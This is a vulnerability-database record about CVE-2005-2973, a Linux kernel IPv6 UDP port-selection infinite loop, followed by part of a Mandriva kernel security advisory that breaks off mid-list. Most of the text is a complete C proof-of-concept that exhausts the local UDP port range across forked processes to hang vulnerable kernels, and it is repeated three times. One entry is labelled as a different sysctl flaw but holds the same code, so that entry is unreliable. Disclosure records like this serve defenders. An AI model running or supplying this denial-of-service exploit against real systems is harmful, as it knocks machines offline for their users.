-1)\r\n\t{\r\n\t\tstruct sockaddr_in6 addr;\r\n\t\tint val = 1;\r\n\r\n\t\tsetsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val));\r\n\r\n\t\tmemset (&addr, 0, sizeof (addr));\r\n\t\taddr.sin6_family = AF_INET6;\r\n\t\taddr.sin6_port = htons (port);\r\n\t\tif (bind (fd, (struct sockaddr *)&addr, sizeof (addr)) == 0)\r\n\t\t\treturn fd;\r\n\r\n\t\tclose (fd);\r\n\t}\r\n\treturn -1;\r\n}\r\n\r\n\r\nstatic int\r\nget_fd_limit (void)\r\n{\r\n\tstruct rlimit lim;\r\n\r\n\tgetrlimit (RLIMIT_NOFILE, &lim);\r\n\tlim.rlim_cur = lim.rlim_max;\r\n\tsetrlimit (RLIMIT_NOFILE, &lim);\r\n\treturn (int)lim.rlim_max;\r\n}\r\n\r\n\r\nstatic void\r\nget_port_range (uint16_t *range)\r\n{\r\n\tFILE *stream;\r\n\r\n\t/* conservative defaults */\r\n\trange[0] = 1024;\r\n\trange[1] = 65535;\r\n\r\n\tstream = fopen ("/proc/sys/net/ipv4/ip_local_port_range", "r");\r\n\tif (stream != NULL)\r\n\t{\r\n\t\tunsigned i[2];\r\n\r\n\t\tif ((fscanf (stream, "%u %u", i, i + 1) == 2)\r\n\t\t && (i[0] <= i[1]) && (i[1] < 65535))\r\n\t\t{\r\n\t\t\trange[0] = (uint16_t)i[0];\r\n\t\t\trange[1] = (uint16_t)i[1];\r\n\t\t}\r\n\t\tfclose (stream);\r\n\t}\r\n}\r\n\r\n\r\n/* The criticial is fairly simple to raise : the infinite loop occurs when\r\n * calling bind with no speficied port number (ie zero), if and only if the\r\n * IPv6 stack cannot find any free UDP port within the local port range\r\n * (normally 32768-61000). Because this requires times more sockets than what\r\n * a process normally can open at a given time, we have to spawn several\r\n * processes. Then, the simplest way to trigger the crash condition consists\r\n * of opening up kernel-allocated UDP ports until it crashes, but that is\r\n * fairly slow (because allocation are stored in small a hash table of lists,\r\n * that are checked at each allocation). A much faster scheme involves getting\r\n * the local port range from /proc, allocating one by one, and only then, ask\r\n * for automatic (any/zero) port allocation.\r\n */\r\nstatic int\r\nproof (void)\r\n{\r\n\tint lim, val = 2;\r\n\tpid_t pid, ppid;\r\n\tuint16_t range[2], port;\r\n\r\n\tlim = get_fd_limit ();\r\n\tif (lim <= 3)\r\n\t\treturn -2;\r\n\r\n\tget_port_range (range);\r\n\r\n\tport = range[0];\r\n\tppid = getpid ();\r\n\r\n\tputs ("Stage 1...");\r\n\tdo\r\n\t{\r\n\t\tswitch (pid = fork ())\r\n\t\t{\r\n\t\t\tcase 0:\r\n\t\t\t\tfor (val = 3; val < lim; val++)\r\n\t\t\t\t\tclose (val);\r\n\r\n\t\t\t\tdo\r\n\t\t\t\t{\r\n\t\t\t\t\tif (bind_udpv6_port (port) >= 0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif (port)\r\n\t\t\t\t\t\t\tport++;\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\tif (port && (errno == EADDRINUSE))\r\n\t\t\t\t\t\tport++; /* skip already used port */\r\n\t\t\t\t\telse\r\n\t\t\t\t\tif (errno != EMFILE)\r\n\t\t\t\t\t\t/* EAFNOSUPPORT -> no IPv6 stack */\r\n\t\t\t\t\t\t/* EADDRINUSE -> not vulnerable */\r\n\t\t\t\t\t\texit (1);\r\n\r\n\t\t\t\t\tif (port > range[1])\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tputs ("Stage 2... should crash quickly");\r\n\t\t\t\t\t\tport = 0;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\twhile (errno != EMFILE);\r\n\r\n\t\t\t\tbreak; /* EMFILE: spawn new process */\r\n\r\n\t\t\tcase -1:\r\n\t\t\t\texit (2);\r\n\r\n\t\t\tdefault:\r\n\t\t\t\twait (&val);\r\n\t\t\t\tif (ppid != getpid ())\r\n\t\t\t\t\texit (WIFEXITED (val) ? WEXITSTATUS (val) : 2);\r\n\t\t}\r\n\t}\r\n\twhile (pid == 0);\r\n\r\n\tputs ("System not vulnerable");\r\n\treturn -val;\r\n}\r\n\r\nint\r\nmain (int argc, char *argv[])\r\n{\r\n\tsetvbuf (stdout, NULL, _IONBF, 0);\r\n\tputs ("Linux kernel IPv6 UDP port infinite loop vulnerability\\n"\r\n\t "proof of concept code\\n"\r\n\t "Copyright (C) 2005 Remi Denis-Courmont "\r\n\t "<\\x65\\x78\\x70\\x6c\\x6f\\x69\\x74\\x40\\x73\\x69\\x6d\\x70"\r\n\t "\\x68\\x61\\x6c\\x65\\x6d\\x70\\x69\\x6e\\x2e\\x63\\x6f\\x6d>\\n");\r\n\r\n\treturn -proof ();\r\n}\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-80123", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 2.6.x - IPv6 Local Denial of Service", "edition": 1, "published": "2005-10-20T00:00:00", "title": "Linux Kernel 2.6.x - IPv6 Local Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2973"], "modified": "2005-10-20T00:00:00", "id": "EXPLOITPACK:23E2E247CAD4740C7EF7045F684CEA3D", "href": "", "sourceData": "/*\nsource: https://www.securityfocus.com/bid/15156/info\n\nLinux Kernel is reported prone to a local denial-of-service vulnerability.\n\nThis issue arises from an infinite loop when binding IPv6 UDP ports. \n*/\n\n\n/*\n * Linux kernel\n * IPv6 UDP port selection infinite loop\n * local denial of service vulnerability\n * proof of concept code\n * version 1.0 (Oct 29 2005)\n * CVE ID: CAN-2005-2973\n *\n * by Remi Denis-Courmont < exploit at simphalempin dot com >\n * http://www.simphalempin.com/dev/\n *\n * Vulnerable:\n * - Linux < 2.6.14 with IPv6\n *\n * Not vulnerable:\n * - Linux >= 2.6.14\n * - Linux without IPv6\n *\n * Fix:\n * http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;\n * a=commit;h=87bf9c97b4b3af8dec7b2b79cdfe7bfc0a0a03b2\n */\n\n\n/*****************************************************************************\n * Copyright (C) 2005 Remi Denis-Courmont. All rights reserved. *\n * *\n * Redistribution and use in source and binary forms, with or without *\n * modification, are permitted provided that the following conditions *\n * are met: *\n * 1. Redistributions of source code must retain the above copyright notice, *\n * this list of conditions and the following disclaimer. *\n * 2. Redistribution in binary form must reproduce the above copyright *\n * notice, this list of conditions and the following disclaimer in the *\n * documentation and/or other materials provided with the distribution. *\n * *\n * The author's liability shall not be incurred as a result of loss of due *\n * the total or partial failure to fulfill anyone's obligations and direct *\n * or consequential loss due to the software's use or performance. *\n * *\n * The current situation as regards scientific and technical know-how at the *\n * time when this software was distributed did not enable all possible uses *\n * to be tested and verified, nor for the presence of any or all faults to *\n * be detected. In this respect, people's attention is drawn to the risks *\n * associated with loading, using, modifying and/or developing and *\n * reproducing this software. *\n * The user shall be responsible for verifying, by any or all means, the *\n * software's suitability for its requirements, its due and proper *\n * functioning, and for ensuring that it shall not cause damage to either *\n * persons or property. *\n * *\n * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR *\n * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES *\n * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. *\n * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, *\n * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT *\n * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY *\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT *\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF *\n * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *\n * *\n * The author does not either expressly or tacitly warrant that this *\n * software does not infringe any or all third party intellectual right *\n * relating to a patent, software or to any or all other property right. *\n * Moreover, the author shall not hold someone harmless against any or all *\n * proceedings for infringement that may be instituted in respect of the *\n * use, modification and redistrbution of this software. *\n *****************************************************************************/\n\n\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n\n#include <errno.h>\n#include <sys/time.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n#include <sys/resource.h>\n#include <unistd.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n\nstatic int\nbind_udpv6_port (uint16_t port)\n{\n\tint fd;\n\n\tfd = socket (AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\tif (fd != -1)\n\t{\n\t\tstruct sockaddr_in6 addr;\n\t\tint val = 1;\n\n\t\tsetsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val));\n\n\t\tmemset (&addr, 0, sizeof (addr));\n\t\taddr.sin6_family = AF_INET6;\n\t\taddr.sin6_port = htons (port);\n\t\tif (bind (fd, (struct sockaddr *)&addr, sizeof (addr)) == 0)\n\t\t\treturn fd;\n\n\t\tclose (fd);\n\t}\n\treturn -1;\n}\n\n\nstatic int\nget_fd_limit (void)\n{\n\tstruct rlimit lim;\n\n\tgetrlimit (RLIMIT_NOFILE, &lim);\n\tlim.rlim_cur = lim.rlim_max;\n\tsetrlimit (RLIMIT_NOFILE, &lim);\n\treturn (int)lim.rlim_max;\n}\n\n\nstatic void\nget_port_range (uint16_t *range)\n{\n\tFILE *stream;\n\n\t/* conservative defaults */\n\trange[0] = 1024;\n\trange[1] = 65535;\n\n\tstream = fopen (\"/proc/sys/net/ipv4/ip_local_port_range\", \"r\");\n\tif (stream != NULL)\n\t{\n\t\tunsigned i[2];\n\n\t\tif ((fscanf (stream, \"%u %u\", i, i + 1) == 2)\n\t\t && (i[0] <= i[1]) && (i[1] < 65535))\n\t\t{\n\t\t\trange[0] = (uint16_t)i[0];\n\t\t\trange[1] = (uint16_t)i[1];\n\t\t}\n\t\tfclose (stream);\n\t}\n}\n\n\n/* The criticial is fairly simple to raise : the infinite loop occurs when\n * calling bind with no speficied port number (ie zero), if and only if the\n * IPv6 stack cannot find any free UDP port within the local port range\n * (normally 32768-61000). Because this requires times more sockets than what\n * a process normally can open at a given time, we have to spawn several\n * processes. Then, the simplest way to trigger the crash condition consists\n * of opening up kernel-allocated UDP ports until it crashes, but that is\n * fairly slow (because allocation are stored in small a hash table of lists,\n * that are checked at each allocation). A much faster scheme involves getting\n * the local port range from /proc, allocating one by one, and only then, ask\n * for automatic (any/zero) port allocation.\n */\nstatic int\nproof (void)\n{\n\tint lim, val = 2;\n\tpid_t pid, ppid;\n\tuint16_t range[2], port;\n\n\tlim = get_fd_limit ();\n\tif (lim <= 3)\n\t\treturn -2;\n\n\tget_port_range (range);\n\n\tport = range[0];\n\tppid = getpid ();\n\n\tputs (\"Stage 1...\");\n\tdo\n\t{\n\t\tswitch (pid = fork ())\n\t\t{\n\t\t\tcase 0:\n\t\t\t\tfor (val = 3; val < lim; val++)\n\t\t\t\t\tclose (val);\n\n\t\t\t\tdo\n\t\t\t\t{\n\t\t\t\t\tif (bind_udpv6_port (port) >= 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tif (port)\n\t\t\t\t\t\t\tport++;\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\tif (port && (errno == EADDRINUSE))\n\t\t\t\t\t\tport++; /* skip already used port */\n\t\t\t\t\telse\n\t\t\t\t\tif (errno != EMFILE)\n\t\t\t\t\t\t/* EAFNOSUPPORT -> no IPv6 stack */\n\t\t\t\t\t\t/* EADDRINUSE -> not vulnerable */\n\t\t\t\t\t\texit (1);\n\n\t\t\t\t\tif (port > range[1])\n\t\t\t\t\t{\n\t\t\t\t\t\tputs (\"Stage 2... should crash quickly\");\n\t\t\t\t\t\tport = 0;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\twhile (errno != EMFILE);\n\n\t\t\t\tbreak; /* EMFILE: spawn new process */\n\n\t\t\tcase -1:\n\t\t\t\texit (2);\n\n\t\t\tdefault:\n\t\t\t\twait (&val);\n\t\t\t\tif (ppid != getpid ())\n\t\t\t\t\texit (WIFEXITED (val) ? WEXITSTATUS (val) : 2);\n\t\t}\n\t}\n\twhile (pid == 0);\n\n\tputs (\"System not vulnerable\");\n\treturn -val;\n}\n\nint\nmain (int argc, char *argv[])\n{\n\tsetvbuf (stdout, NULL, _IONBF, 0);\n\tputs (\"Linux kernel IPv6 UDP port infinite loop vulnerability\\n\"\n\t \"proof of concept code\\n\"\n\t \"Copyright (C) 2005 Remi Denis-Courmont \"\n\t \"<\\x65\\x78\\x70\\x6c\\x6f\\x69\\x74\\x40\\x73\\x69\\x6d\\x70\"\n\t \"\\x68\\x61\\x6c\\x65\\x6d\\x70\\x69\\x6e\\x2e\\x63\\x6f\\x6d>\\n\");\n\n\treturn -proof ();\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service", "edition": 1, "published": "2005-11-09T00:00:00", "title": "Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2973"], "modified": "2005-11-09T00:00:00", "id": "EXPLOITPACK:16647E5594ED181F7D7B260061A8238D", "href": "", "sourceData": "/*\nsource: https://www.securityfocus.com/bid/15365/info\n\nLinux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from a failure to properly unregister kernel resources when network devices are removed.\n\nThis issue allows local attackers to deny service to legitimate users. Attackers may also be able to execute arbitrary code in the context of the kernel, but this has not been confirmed. \n*/\n\n\n/*\n * Linux kernel\n * IPv6 UDP port selection infinite loop\n * local denial of service vulnerability\n * proof of concept code\n * version 1.0 (Oct 29 2005)\n * CVE ID: CAN-2005-2973\n *\n * by Remi Denis-Courmont < exploit at simphalempin dot com >\n * http://www.simphalempin.com/dev/\n *\n * Vulnerable:\n * - Linux < 2.6.14 with IPv6\n *\n * Not vulnerable:\n * - Linux >= 2.6.14\n * - Linux without IPv6\n *\n * Fix:\n * http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;\n * a=commit;h=87bf9c97b4b3af8dec7b2b79cdfe7bfc0a0a03b2\n */\n\n\n/*****************************************************************************\n * Copyright (C) 2005 Remi Denis-Courmont. All rights reserved. *\n * *\n * Redistribution and use in source and binary forms, with or without *\n * modification, are permitted provided that the following conditions *\n * are met: *\n * 1. Redistributions of source code must retain the above copyright notice, *\n * this list of conditions and the following disclaimer. *\n * 2. Redistribution in binary form must reproduce the above copyright *\n * notice, this list of conditions and the following disclaimer in the *\n * documentation and/or other materials provided with the distribution. *\n * *\n * The author's liability shall not be incurred as a result of loss of due *\n * the total or partial failure to fulfill anyone's obligations and direct *\n * or consequential loss due to the software's use or performance. *\n * *\n * The current situation as regards scientific and technical know-how at the *\n * time when this software was distributed did not enable all possible uses *\n * to be tested and verified, nor for the presence of any or all faults to *\n * be detected. In this respect, people's attention is drawn to the risks *\n * associated with loading, using, modifying and/or developing and *\n * reproducing this software. *\n * The user shall be responsible for verifying, by any or all means, the *\n * software's suitability for its requirements, its due and proper *\n * functioning, and for ensuring that it shall not cause damage to either *\n * persons or property. *\n * *\n * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR *\n * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES *\n * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. *\n * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, *\n * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT *\n * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY *\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT *\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF *\n * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *\n * *\n * The author does not either expressly or tacitly warrant that this *\n * software does not infringe any or all third party intellectual right *\n * relating to a patent, software or to any or all other property right. *\n * Moreover, the author shall not hold someone harmless against any or all *\n * proceedings for infringement that may be instituted in respect of the *\n * use, modification and redistrbution of this software. *\n *****************************************************************************/\n\n\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n\n#include <errno.h>\n#include <sys/time.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n#include <sys/resource.h>\n#include <unistd.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n\nstatic int\nbind_udpv6_port (uint16_t port)\n{\n\tint fd;\n\n\tfd = socket (AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\tif (fd != -1)\n\t{\n\t\tstruct sockaddr_in6 addr;\n\t\tint val = 1;\n\n\t\tsetsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val));\n\n\t\tmemset (&addr, 0, sizeof (addr));\n\t\taddr.sin6_family = AF_INET6;\n\t\taddr.sin6_port = htons (port);\n\t\tif (bind (fd, (struct sockaddr *)&addr, sizeof (addr)) == 0)\n\t\t\treturn fd;\n\n\t\tclose (fd);\n\t}\n\treturn -1;\n}\n\n\nstatic int\nget_fd_limit (void)\n{\n\tstruct rlimit lim;\n\n\tgetrlimit (RLIMIT_NOFILE, &lim);\n\tlim.rlim_cur = lim.rlim_max;\n\tsetrlimit (RLIMIT_NOFILE, &lim);\n\treturn (int)lim.rlim_max;\n}\n\n\nstatic void\nget_port_range (uint16_t *range)\n{\n\tFILE *stream;\n\n\t/* conservative defaults */\n\trange[0] = 1024;\n\trange[1] = 65535;\n\n\tstream = fopen (\"/proc/sys/net/ipv4/ip_local_port_range\", \"r\");\n\tif (stream != NULL)\n\t{\n\t\tunsigned i[2];\n\n\t\tif ((fscanf (stream, \"%u %u\", i, i + 1) == 2)\n\t\t && (i[0] <= i[1]) && (i[1] < 65535))\n\t\t{\n\t\t\trange[0] = (uint16_t)i[0];\n\t\t\trange[1] = (uint16_t)i[1];\n\t\t}\n\t\tfclose (stream);\n\t}\n}\n\n\n/* The criticial is fairly simple to raise : the infinite loop occurs when\n * calling bind with no speficied port number (ie zero), if and only if the\n * IPv6 stack cannot find any free UDP port within the local port range\n * (normally 32768-61000). Because this requires times more sockets than what\n * a process normally can open at a given time, we have to spawn several\n * processes. Then, the simplest way to trigger the crash condition consists\n * of opening up kernel-allocated UDP ports until it crashes, but that is\n * fairly slow (because allocation are stored in small a hash table of lists,\n * that are checked at each allocation). A much faster scheme involves getting\n * the local port range from /proc, allocating one by one, and only then, ask\n * for automatic (any/zero) port allocation.\n */\nstatic int\nproof (void)\n{\n\tint lim, val = 2;\n\tpid_t pid, ppid;\n\tuint16_t range[2], port;\n\n\tlim = get_fd_limit ();\n\tif (lim <= 3)\n\t\treturn -2;\n\n\tget_port_range (range);\n\n\tport = range[0];\n\tppid = getpid ();\n\n\tputs (\"Stage 1...\");\n\tdo\n\t{\n\t\tswitch (pid = fork ())\n\t\t{\n\t\t\tcase 0:\n\t\t\t\tfor (val = 3; val < lim; val++)\n\t\t\t\t\tclose (val);\n\n\t\t\t\tdo\n\t\t\t\t{\n\t\t\t\t\tif (bind_udpv6_port (port) >= 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tif (port)\n\t\t\t\t\t\t\tport++;\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\tif (port && (errno == EADDRINUSE))\n\t\t\t\t\t\tport++; /* skip already used port */\n\t\t\t\t\telse\n\t\t\t\t\tif (errno != EMFILE)\n\t\t\t\t\t\t/* EAFNOSUPPORT -> no IPv6 stack */\n\t\t\t\t\t\t/* EADDRINUSE -> not vulnerable */\n\t\t\t\t\t\texit (1);\n\n\t\t\t\t\tif (port > range[1])\n\t\t\t\t\t{\n\t\t\t\t\t\tputs (\"Stage 2... should crash quickly\");\n\t\t\t\t\t\tport = 0;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\twhile (errno != EMFILE);\n\n\t\t\t\tbreak; /* EMFILE: spawn new process */\n\n\t\t\tcase -1:\n\t\t\t\texit (2);\n\n\t\t\tdefault:\n\t\t\t\twait (&val);\n\t\t\t\tif (ppid != getpid ())\n\t\t\t\t\texit (WIFEXITED (val) ? WEXITSTATUS (val) : 2);\n\t\t}\n\t}\n\twhile (pid == 0);\n\n\tputs (\"System not vulnerable\");\n\treturn -val;\n}\n\nint\nmain (int argc, char *argv[])\n{\n\tsetvbuf (stdout, NULL, _IONBF, 0);\n\tputs (\"Linux kernel IPv6 UDP port infinite loop vulnerability\\n\"\n\t \"proof of concept code\\n\"\n\t \"Copyright (C) 2005 Remi Denis-Courmont \"\n\t \"<\\x65\\x78\\x70\\x6c\\x6f\\x69\\x74\\x40\\x73\\x69\\x6d\\x70\"\n\t \"\\x68\\x61\\x6c\\x65\\x6d\\x70\\x69\\x6e\\x2e\\x63\\x6f\\x6d>\\n\");\n\n\treturn -proof ();\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:14", "bulletinFamily": "software", "cvelist": ["CVE-2004-2302", "CVE-2005-2457", "CVE-2005-3181", "CVE-2004-1333", "CVE-2005-3273", "CVE-2005-0180", "CVE-2005-3275", "CVE-2005-3274", "CVE-2005-3044", "CVE-2005-3257", "CVE-2005-0210", "CVE-2005-2800", "CVE-2005-3180", "CVE-2005-0449", "CVE-2005-3055", "CVE-2005-3271", "CVE-2005-2555", "CVE-2005-3276"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n \r\n Mandriva Linux Security Advisory MDKSA-2005:218\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n \r\n Package : kernel\r\n Date : November 30, 2005\r\n Affected: Corporate 3.0, Multi Network Firewall 2.0\r\n _______________________________________________________________________\r\n \r\n Problem Description:\r\n \r\n Multiple vulnerabilities in the Linux 2.6 kernel have been discovered\r\n and corrected in this update:\r\n \r\n An integer overflow in vc_resize (CAN-2004-1333).\r\n \r\n A race condition in the sysfs_read_file and sysfs_write_file functions\r\n in 2.6.10 and earlier allows local users to read kernel memory and\r\n cause a DoS (crash) via large offsets in sysfs files (CAN-2004-2302).\r\n \r\n An integer signedness error in scsi_ioctl.c (CVE-2005-0180).\r\n \r\n Netfilter allows a local user to cause a DoS (memory consumption) via\r\n certain packet fragments that are reassembled twice, which causes a\r\n data structure to be allocated twice (CVE-2005-0210).\r\n \r\n The netfilter/iptables module in versions prior to 2.6.8.1 allow remote\r\n attackers to cause a DoS (crash) or bypass firewall rules via crafted\r\n packets, which are not properly handled by skb_checksum_help function\r\n (CVE-2005-0449).\r\n \r\n The zisofs driver in versions prior to 2.6.12.5 allows local users and\r\n remove attackers to cause a DoS (crash) via a crafted compressed ISO\r\n filesystem (CVE-2005-2457).\r\n \r\n The kernel does not properly restrict socket policy access to users\r\n with the CAP_NET_ADMIN capability, which could allow local users to\r\n conduct unauthorized activities via ipv4/ip_sockglue.c and\r\n ipv6/ipv6_sockglue.c (CVE-2005-2555).\r\n \r\n A memory leak in the seq_file implementation in the SCSI procfs\r\n interface (sg.c) in 2.6.13 and earlier allows a local user to cause a\r\n DoS (memory consumption) via certain repeated reads from\r\n /proc/scsi/gs/devices file which is not properly handled when the\r\n next() interator returns NULL or an error (CVE-2005-2800).\r\n \r\n Multiple vulnerabilities in versions prior to 2.6.13.2 allow local\r\n users to cause a DoS (oops from null dereference) via fput in a 32bit\r\n ioctl on 64-bit x86 systems or sockfd_put in the 32-bit routing_ioctl\r\n function on 64-bit systems (CVE-2005-3044).\r\n \r\n Versions 2.6.8 to 2.6.14-rc2 allow local users to cause a DoS (oops)\r\n via a userspace process that issues a USB Request Block (URB) to a USB\r\n device and terminates before the URB is finished, which leads to a\r\n stale pointer reference (CVE-2005-3055).\r\n \r\n The Orinoco driver in 2.6.13 and earlier does not properly clear memory\r\n from a previously used packet whose length is increased, allowing\r\n remote attackers to obtain sensitive information (CVE-2005-3180).\r\n \r\n Kernels 2.6.13 and earlier, when CONFIG_AUDITSYSCALL is enabled, use an\r\n incorrect function to free names_cache memory, preventing the memory\r\n from being tracked by AUDITSYSCALL code and leading to a memory leak\r\n (CVE-2005-3181).\r\n \r\n The VT implementation in version 2.6.12 allows local users to use\r\n certain IOCTLs on terminals of other users and gain privileges\r\n (CVE-2005-3257).\r\n \r\n Exec does not properly clear posix-timers in multi-threaded\r\n environments, which result in a resource leak and could allow a large\r\n number of multiple local users to cause a DoS by using more posix-\r\n timers than specified by the quota for a single user (CVE-2005-3271).\r\n \r\n The rose_rt_ioctl function rose_route.c in versions prior to 2.6.12\r\n does not properly verify the ndigis argument for a new route, allowing\r\n an attacker to trigger array out-of-bounds errors with a large number\r\n of digipeats (CVE-2005-3273).\r\n \r\n A race condition in ip_vs_conn_flush in versions prior to 2.6.13, when\r\n running on SMP systems, allows local users to cause a DoS (null\r\n dereference) by causing a connection timer to expire while the\r\n connection table is being flushed before the appropriate lock is\r\n acquired (CVE-2005-3274).\r\n \r\n The NAT code in versions prior to 2.6.13 incorrectly declares a\r\n variable to be static, allowing remote attackers to cause a DoS (memory\r\n corruption) by causing two packets for the same protocol to be NATed at\r\n the same time (CVE-2005-3275).\r\n \r\n The sys_get_thread_area function in process.c in versions prior to\r\n 2.6.12.4 and 2.6.13 does not clear a data structure before copying it\r\n to userspace, which may allow a user process to obtain sensitive\r\n information (CVE-2005-3276).\r\n \r\n The following non-security fixes are also applied:\r\n \r\n Support for the arp_ignore and arp_announce sysctls were added to the\r\n Corporate 3 kernels (bugzilla #16346).\r\n \r\n The provided packages are patched to fix these vulnerabilities. All\r\n users are encouraged to upgrade to these updated kernels.\r\n \r\n To update your kernel, please follow the directions located at:\r\n \r\n http://www.mandriva.com/en/security/kernelupdate\r\n _______________________________________________________________________\r\n\r\n References:\r\n \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1333\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-2302\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0180\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0210\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0449\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2457\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2555\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2800\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3044\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3055\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3180\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3181\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3257\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3271\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3273\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3274\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3275\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3276\r\n http://qa.mandriva.com/show_bug.cgi?id=16346\r\n _______________________________________________________________________\r\n \r\n Updated Packages:\r\n \r\n Corporate 3.0:\r\n 7e38bcdc8a3900485d17d08e13963700 corporate/3.0/RPMS/kernel-2.6.3.29mdk-1-1mdk.i586.rpm\r\n be4dc943991be67f9f612ac5ca2f6c10 corporate/3.0/RPMS/kernel-enterprise-2.6.3.29mdk-1-1mdk.i586.rpm\r\n 9acc6e90b1a8620be6af552baa8524ab corporate/3.0/RPMS/kernel-i686-up-4GB-2.6.3.29mdk-1-1mdk.i586.rpm\r\n 1a171d91312764089f2f0c84a6e9131a corporate/3.0/RPMS/kernel-p3-smp-64GB-2.6.3.29mdk-1-1mdk.i586.rpm\r\n e6f42b56669ca4ac5515d728051c4f88 corporate/3.0/RPMS/kernel-secure-2.6.3.29mdk-1-1mdk.i586.rpm\r\n 5f3e473fae7614433328756156f2b953 corporate/3.0/RPMS/kernel-smp-2.6.3.29mdk-1-1mdk.i586.rpm\r\n c98b0f07cb49a918201d2daa1ac23e7c corporate/3.0/RPMS/kernel-source-2.6.3-29mdk.i586.rpm\r\n e816bcde98728e85a86c565259364f8a corporate/3.0/RPMS/kernel-source-stripped-2.6.3-29mdk.i586.rpm\r\n b2497e007272f38b30e98b4231a77a76 corporate/3.0/SRPMS/kernel-2.6.3.29mdk-1-1mdk.src.rpm\r\n\r\n Corporate 3.0/X86_64:\r\n 5261e06d1085ff9c61bf29789f10669f 